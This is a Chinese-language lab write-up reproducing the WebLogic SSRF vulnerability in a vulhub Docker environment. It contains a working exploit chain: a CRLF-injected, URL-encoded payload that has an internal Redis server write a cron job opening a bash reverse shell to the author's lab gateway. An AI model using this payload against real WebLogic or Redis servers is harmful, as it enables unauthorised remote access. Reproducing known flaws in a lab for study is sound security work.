采用的虛擬機(jī)環(huán)境為ubuntu16.04，在虛擬機(jī)上搭建好docker環(huán)境。采用的vulhub來進(jìn)行復(fù)現(xiàn)。
使用git來下載，命令為git clone https://github.com/vulhub/vulhub.git

進(jìn)入ssrf漏洞中，
cd /vulhub/weblogic/ssrf

創(chuàng)建漏洞環(huán)境
docker-compose up -d

查看容器
docker ps

虛擬機(jī)地址為192.168.6.136，訪問http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp

成功創(chuàng)建漏洞環(huán)境。

ssrf漏洞測試
打開代理工具攔截http請求包

可以看到參數(shù)中存在一個網(wǎng)址，將參數(shù)改為http://192.168.6.136:7001

再訪問一個不存在的端口

從兩次不同的http請求包結(jié)果中可知，weblogic中存在這ssrf漏洞。
查看weblogic容器的地址
docker inspect 642ac3b75ae8

同理 docker inspect fe0822abff42

注入HTTP頭，利用Redis的反彈shell
通過SSRF探測內(nèi)網(wǎng)中的Redis的服務(wù)器

想redis服務(wù)器發(fā)送命令
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/監(jiān)聽ip/port 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save
利用回車換行將三條命令連接，換行符號的url編碼為%od%oa，注入的代碼為
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
在虛擬機(jī)中監(jiān)聽，容器的網(wǎng)關(guān)為172.19.0.1，即為虛擬機(jī)的地址。

發(fā)包

成功得到shell。

到此，漏洞成功復(fù)現(xiàn)。

總結(jié)

以上是生活随笔為你收集整理的weblogic ssrf漏洞复现的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。